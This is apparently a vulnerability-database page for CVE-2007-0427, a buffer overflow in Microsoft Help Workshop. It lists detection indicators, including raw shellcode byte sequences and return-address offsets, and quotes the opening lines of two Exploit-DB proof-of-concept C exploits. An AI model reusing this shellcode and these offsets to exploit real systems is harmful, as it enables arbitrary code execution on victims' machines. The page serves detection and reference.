CVE-2007-0427
published 2007-01-23CVE-2007-0427: Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.96%
98.0th percentile
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | html_help_workshop | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 32 d2 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 32 d2 88 10 58 50 66 2d 11 05 48 40 8b d0 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
bytes↗
66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 b2 01 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 b2 01 88 10 58 50 66 2d 11 05 48 40 8b d0 80 38 01 74 03 40 eb f8 32 c9 88 08 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
bytes↗
e9 1b fe ff ff
- →Stack-based buffer overflow is triggered by a long HLP field value in the [OPTIONS] section of a .HPJ project file opened in Microsoft Help Workshop 4.03.0002 ↗
- →Exploit .cnt file payload begins with the ASCII string '0 Microsoft Help Workshop PoC exploit by porkythepig' followed immediately by shellcode; detect this pattern in .cnt files ↗
- →Exploit .HPJ file payload begins with ';Microsoft Help Workshop PoC exploit by porkythepig' followed by [OPTIONS] and HLP= with embedded shellcode; detect oversized HLP= values in .HPJ files ↗
- →The .cnt exploit buffer is exactly 619 bytes and the .HPJ exploit buffer is exactly 671 bytes; anomalously sized crafted files of these exact lengths targeting Help Workshop should be flagged ↗
- →The .HPJ exploit buffer is exactly 671 bytes; anomalously sized crafted files of this exact length targeting Help Workshop should be flagged ↗
- →Return address overwrite in .cnt exploit occurs at offset 0x210 (528 bytes) into the buffer; monitor for EIP control at this offset when parsing .cnt files ↗
- →Return address overwrite in .HPJ exploit occurs at offset 0x14e (334 bytes) into the buffer; monitor for EIP control at this offset when parsing .HPJ files ↗
- ·The exploit provides five OS-specific API pointer sets (osApiPtrs); the JMP ESP gadget addresses and API addresses vary per OS version. Detection based on hardcoded return addresses will only cover the specific OS variants targeted by this PoC. ↗
- ·The vulnerability is described as 'user-assisted', meaning the victim must manually open a malicious .HPJ or .cnt file in Microsoft Help Workshop; exploitation requires social engineering. ↗
- ·Microsoft Help Workshop 4.03.0002 is described as a standard component of MS Visual Studio v6.0 and 2003 (.NET); affected systems are those with these Visual Studio versions installed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
exploitdb·2007-01-19
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e
#define PROC_NAME_OFFSET 0x166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
unsigned int extPro;
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
exploitdb·2007-01-17
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
No writeups or analysis indexed.
http://osvdb.org/31899http://secunia.com/advisories/23862http://securityreason.com/securityalert/2177http://www.anspi.pl/~porkythepig/visualization/hpj-x01.cpphttp://www.securityfocus.com/archive/1/457436/100/0/threadedhttp://www.securityfocus.com/bid/22135http://osvdb.org/31899http://secunia.com/advisories/23862http://securityreason.com/securityalert/2177http://www.anspi.pl/~porkythepig/visualization/hpj-x01.cpphttp://www.securityfocus.com/archive/1/457436/100/0/threadedhttp://www.securityfocus.com/bid/22135
2007-01-23
Published